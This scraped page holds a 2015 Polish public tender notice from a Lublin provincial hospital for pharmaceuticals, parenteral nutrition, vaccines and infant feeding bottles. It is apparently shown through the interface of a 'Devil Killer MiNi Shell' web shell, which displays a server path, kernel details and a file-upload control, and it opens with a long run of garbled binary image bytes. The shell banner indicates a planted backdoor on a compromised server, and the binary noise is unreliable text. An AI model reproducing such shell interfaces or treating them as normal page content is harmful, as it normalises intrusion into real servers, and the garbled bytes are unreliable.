JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150612/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150612/86579-N-2015.html

<p class="kh_header"><b>Lublin: DOSTAWA PREPARATÓW I WITAMIN DO ŻYWIENIA POZAJELITOWEGO, PRODUKTÓW LECZNICZYCH, SUROWCÓW FARMACEUTYCZNYCH I DROBNYCH AKCESORIÓW APTECZNYCH, BUTELEK ORAZ SMOCZKÓW - IX PAKIETÓW</b><br>
<b>Numer ogłoszenia: 86579 - 2015; data zamieszczenia: 12.06.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Szpital Wojewódzki im. Jana Bożego , ul. Biernackiego 9, 20-089 Lublin, woj. lubelskie, tel. 81 740 86 14, faks 81 740 39 34.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spszw.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA PREPARATÓW I WITAMIN DO ŻYWIENIA POZAJELITOWEGO, PRODUKTÓW LECZNICZYCH, SUROWCÓW FARMACEUTYCZNYCH I DROBNYCH AKCESORIÓW APTECZNYCH, BUTELEK ORAZ SMOCZKÓW - IX PAKIETÓW.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa preparatów i witamin dla dzieci do żywienia pozajelitowego (Pakiet I), leku o nazwie międzynarodowej Antithrombinum III (Pakiet II), leku o nazwie międzynarodowej ceftazidime (Pakiet III), szczepionek przeciw grypie (pakiet IV), leku stosowanego w procedurze leczenia przewlekłego wzw u dzieci (Pakiet V), surowców farmaceutycznych (Pakiet VI), benzyny aptecznej (Pakiet VII), opłatków, butelek, zakraplaczy, nakrętek, podkładów, form, pudełek i artykułów aptecznych (Pakiet VIII), butelek i smoczków do karmienia dzieci (Pakiet IX). Zakres zamówienia obejmuje IX nw. Pakietów:
Pakiet I - Dostawa preparatów oraz witamin dla dzieci do żywienia pozajelitowego, 18 zadań,  
Pakiet II - Dostawa leku przeciwzakrzepowego o nazwie międzynarodowej Antithrombinum III,
Pakiet III - Dostawa leku przeciwzakaźnego o nazwie międzynarodowej Ceftazidime,
Pakiet IV - Dostawa szczepionki przeciw grypie na sezon 2015/2016,
Pakiet V -  Dostawa leku stosowanego w procedurze leczenia przewlekłego wzw u dzieci,
Pakiet VI -  Dostawa surowców farmaceutycznych (substancji do receptury),
Pakiet VII -  Dostawa benzyny aptecznej,
Pakiet VIII - Dostawa drobnych akcesoriów aptecznych, 17 zadań,
Pakiet IX - Dostawa smoczków oraz butelek dla noworodków i wcześniaków.
2. Szczegółowe wymagania w stosunku do ww. asortymentu zamówienia i jego zakres zawierają załączniki nr 1-9 do SIWZ, określające wymagania Zamawiającego odnośnie przedmiotu zamówienia. 
3. Zaoferowane w Pakiecie V, leki muszą znajdować się w obowiązującym na dzień składania ofert Wykazie refundowanych leków, środków spożywczych specjalnego przeznaczenia żywieniowego oraz wyrobów medycznych - w Załączniku B, zgodnie z aktualnym obwieszczeniem Ministra Zdrowia, wydanym na podstawie art. 37 ustawy z dnia 12 maja 2011 r. o refundacji leków, środków spożywczych specjalnego przeznaczenia żywieniowego oraz wyrobów medycznych (Dz. U. Nr 122, poz. nr 696 ze zm.). 

4. Wykonawca podczas realizacji zamówienia zobowiązany jest do dostarczania opłatków, drobnych akcesoriów aptecznych oraz smoczków do karmienia będących przedmiotem zamówienia w opakowaniach zbiorczych, z etykietą zawierającą nazwę artykułu, ilość sztuk w opakowaniu oraz nazwę i adres producenta - dot. Pakietu VIII.
5. W przypadku, gdy produkt leczniczy będący przedmiotem zamówienia w momencie wyceny nie jest dostępny na rynku, Wykonawca zobowiązany jest do wyceny tego produktu leczniczego po ostatniej obowiązującej cenie.
6. Zamawiający nie wymaga aby całość zamówienia była wykonana samodzielnie przez Wykonawcę.  W takim przypadku Wykonawca odpowiada za działania, uchybienia zaniedbania tak jak za własne działania, uchybienia, zaniedbania.                                                                  
7. Zamawiający zastrzega sobie prawo do zmiany ilości przedmiotu zamówienia, w zależności od rzeczywistych potrzeb Zamawiającego, wynikających z bieżącej działalności, których nie można przewidzieć w chwili zawarcia umowy, oznacza to, że zapotrzebowane ilości przedmiotu zamówienia  określone w załącznikach 1-9 do SIWZ są szacunkowe i mogą podlegać zmianom w trakcie realizacji umowy. Wykonawcy nie przysługują roszczenia o ilości wstępnie zapotrzebowane przez Zamawiającego..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.69.22.00-9, 33.65.00.00-1, 33.62.11.00-0, 33.65.11.00-9, 33.60.00.00-6, 09.13.21.00-4, 33.69.30.00-4, 33.68.10.00-7, 33.62.14.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 42.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium przetargowego</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia powyższego warunku zostanie dokonana wg. formuły spełnia - nie spełnia w oparciu o dokument przedłożony przez Wykonawcę zgodnie z wymaganiem Zamawiającego, określonym w pkt. 5.3. lit b) na potwierdzenie warunku określonego w ppkt. 5.1. lit. a). Zamawiający uzna za spełnienie warunku posiadanie wymaganej prawem aktualnej koncesji/zezwolenia na prowadzenie hurtowni farmaceutycznej/ składu celnego/ składu konsygnacyjnego na prowadzenie obrotu asortymentem stanowiącym przedmiot zamówienia / zezwolenia na wytwarzanie produktów leczniczych, surowców farmaceutycznych, stanowiących przedmiot oferty, odpowiednio, jeśli Wykonawca jest wytwórcą - w odniesieniu do Pakietu I-VII oraz zad. nr 9 (Pakiet VIII).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia powyższego warunku zostanie dokonana wg. formuły spełnia - nie spełnia w oparciu o oświadczenie przedłożone przez Wykonawcę zgodnie z wymaganiem Zamawiającego, określonym w pkt. 5.3. lit. a) SIWZ na potwierdzenie warunku określonego w ppkt. 5.1. lit. b) SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia powyższego warunku zostanie dokonana wg. formuły spełnia - nie spełnia w oparciu o oświadczenie przedłożone przez Wykonawcę zgodnie z wymaganiem Zamawiającego, określonym w pkt. 5.3. lit. a) SIWZ na potwierdzenie warunku określonego w ppkt. 5.1. lit. c) SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia powyższego warunku zostanie dokonana wg. formuły spełnia - nie spełnia w oparciu o oświadczenie przedłożone przez Wykonawcę zgodnie z wymaganiem Zamawiającego, określonym w pkt. 5.3. lit. a) SIWZ na potwierdzenie warunku określonego w ppkt. 5.1. lit. c) SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia powyższego warunku zostanie dokonana wg. formuły spełnia - nie spełnia w oparciu o oświadczenie przedłożone przez Wykonawcę zgodnie z wymaganiem Zamawiającego, określonym w pkt. 5.3. lit. a) SIWZ na potwierdzenie warunku określonego w ppkt. 5.1. lit. d) SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">WYMAGANIA ZAMAWIAJĄCEGO DOTYCZĄCE PRZEDMIOTU ZAMÓWIENIA:


Wymagania Zamawiającego dotyczące przedmiotu zamówienia określonego w Pakiecie I-IX, zawierają zał. nr 1,2,3,4,5,6,7,9 do SIWZ. 
Ponadto Zamawiający wymaga, aby: 
9.1. wszystkie zaoferowane produkty w Pakiecie I-IX, posiadały aktualne dokumenty dopuszczające do obrotu i używania na terytorium Rzeczypospolitej Polskiej, zgodnie z obowiązującymi przepisami prawa.

9.2. wszystkie zaoferowane akcesoria drobne apteczne w Pakiecie VIII (zad. nr 1-8, 10-17), produkowane były w oparciu o zalecenie normy PN-EN ISO 15378:2012, z uwzględnieniem Dobrej Praktyki Wytwarzania (GMP),

9.3 zaoferowane butelki oraz smoczki do karmienia noworodków i wcześniaków w Pakiecie IX, spełniały wymagania Rozporządzenia Ministra Zdrowia z dnia 15 stycznia 2008 r. w sprawie wykazu substancji, których stosowanie jest dozwolone w procesie wytwarzania lub przetwarzania materiałów i wyrobów z innych tworzyw niż tworzywa sztuczne przeznaczone do kontaktu z żywnością, 

9.4. wszystkie zaoferowane leki w Pakiecie I-V, posiadały ważną charakterystykę dla produktu leczniczego, a dla surowców farmaceutycznych w Pakiecie VI - kartę charakterystyki substancji niebezpiecznej, okazywalną na każde żądanie Zamawiającego,

W celu potwierdzenia, że oferowany przedmiot zamówienia odpowiada wymaganiom określonym przez Zamawiającego, Wykonawca zobowiązany jest również do załączenia wraz z ofertą nw. dokumentów:

9.5. Oświadczenie Wykonawcy, iż oferowany przedmiot zamówienia w Pakiecie I-IX, aktualne dokumenty dopuszczające do obrotu i używania na terytorium Rzeczypospolitej Polskiej, zgodnie z obowiązującymi przepisami prawa oraz dostarczy je na każde żądanie Zamawiającego w trakcie realizacji umowy,

9.6. oświadczenia Wykonawcy, iż wszystkie zaoferowane w formularzu cenowym akcesoria drobne apteczne produkowane są w oparciu o zalecenie normy PN-EN ISO 15378:2012 z uwzględnieniem Dobrej Praktyki Wytwarzania (GMP) - dotyczy Pakietu VIII (zad. nr 1-8,10-17).

9.7. oświadczenia Wykonawcy, iż zaoferowane w formularzu cenowym butelki oraz smoczki do karmienia noworodków i wcześniaków spełniają wymagania Rozporządzenia Ministra Zdrowia z dnia 15 stycznia 2008 r. w sprawie wykazu substancji, których stosowanie jest dozwolone w procesie wytwarzania lub przetwarzania materiałów i wyrobów z innych tworzyw niż tworzywa sztuczne przeznaczone do kontaktu z żywnością oraz nie stanowią zagrożenia dla zdrowia człowieka - dotyczy Pakietu IX.

9.8. oświadczenie, iż wszystkie zaoferowane w Pakiecie I-V produkty lecznicze, posiadają ważną charakterystykę dla produktu leczniczego, a dla surowców farmaceutycznych w Pakiecie VI - kartę charakterystyki substancji niebezpiecznej, okazywalną na każde żądanie Zamawiającego.

Wzory ww. oświadczeń, stanowią Załączniki nr 13,14,15,16 do SIWZ.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>WYKONAWCY WSPÓLNIE UBIEGAJĄCY SIĘ  O UDZIELENIE  ZAMÓWIENIA:


8.1. Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia ustanawiają Pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego i takie pełnomocnictwo powinni dołączyć do oferty. Pełnomocnictwo powinno:
- jednoznacznie określać postępowanie, do którego się odnosi i precyzować zakres umocowania
- wymieniać wszystkich Wykonawców, którzy wspólnie ubiegają się o udzielenie zamówienia
- każdy z Wykonawców udzielających pełnomocnictwa musi podpisać się na dokumencie pełnomocnictwa, zgodnie z zasadą reprezentacji.
8.2. Przepisy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
W odniesieniu do wymagań postawionych przez Zamawiającego, każdy z przedsiębiorców wchodzących w skład konsorcjum lub każdy ze wspólników wchodzących w skład spółki cywilnej oddzielnie musi udokumentować, że nie podlega wykluczeniu na podstawie art. 24 ustawy Pzp, tzn. każdy z nich z osobna musi złożyć oświadczenia i dokumenty wymagane w pkt.: 6. Dokumenty wymienione w pkt. 5.3. konsorcjanci lub wspólnicy mogą złożyć wspólnie. Kopie dokumentów dotyczących odpowiednio Wykonawcy wchodzącego w skład konsorcjum lub spółki cywilnej muszą być poświadczane za zgodność z oryginałem przez tego wykonawcę (konsorcjanta lub wspólnika). 
8.3. Zgodnie z art. 141 ustawy Pzp. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy.
8.4. Wszelka korespondencja i rozliczenia dokonywane będą wyłącznie z Pełnomocnikiem</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin płatności - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Strony dopuszczają możliwość zmiany umowy w niżej wymienionych  przypadkach:
a) zmiany nazwy produktu, nazwy producenta przy niezmienionym produkcie, numeru katalogowego produktu, 
b) jeżeli Wykonawca nie będzie miał możliwości dostarczenia zamiennika w cenie przetargowej z uwagi na zagrożenie rażącą stratą dla Wykonawcy, Zamawiający wyrazi zgodę  na wyłączenie tego produktu z umowy bez konieczności  ponoszenia kary  przez Wykonawcę, przy czym po stronie  Wykonawcy leży  obowiązek udowodnienia okoliczności   zagrożenia rażącą stratą,
	c) zmiany w części dotyczącej sposobu konfekcjonowania (wielkość opakowania), z wyłączeniem poz. nr 1 w Pakiecie V, nazwy, producenta dostarczanych produktów, jeśli z przyczyn niezależnych od Wykonawcy nie jest możliwe dostarczenie produktów wskazanych w ofercie, w szczególności przyczyną taką może być wycofanie z obrotu lub zaprzestanie ich produkcji, 
d) wniosek o dokonanie zmiany umowy należy przedłożyć na piśmie, okoliczności mogące stanowić podstawę zmiany umowy powinny być uzasadnione, a w miarę możliwości również udokumentowane przez Wykonawcę.
Powyższe zmiany nie mogą skutkować wzrostem cen produktów.
W przypadku ustawowego obniżenia lub podwyższenia stawki podatku od towarów i usług VAT w okresie realizacji umowy, każdej ze stron przysługuje prawo zwrócenia się do drugiej strony o przeprowadzenie negocjacji w sprawie odpowiedniej zmiany wynagrodzenia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spszw.lublin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Szpital Wojewódzki im. Jana Bożego ul. Biernackiego 9, 20-089,Dział Zamówień Publicznych i Zaopatrzenia pok. nr 12A.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.06.2015 godzina 12:00, miejsce: Kancelaria Samodzielnego Publicznego Szpitala Wojewódzkiego im. Jana Bożego ul. Biernackiego 9, 20-089 (w budynku administracyjnym pok. 27) lub drogą pocztową ( na własne ryzyko).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





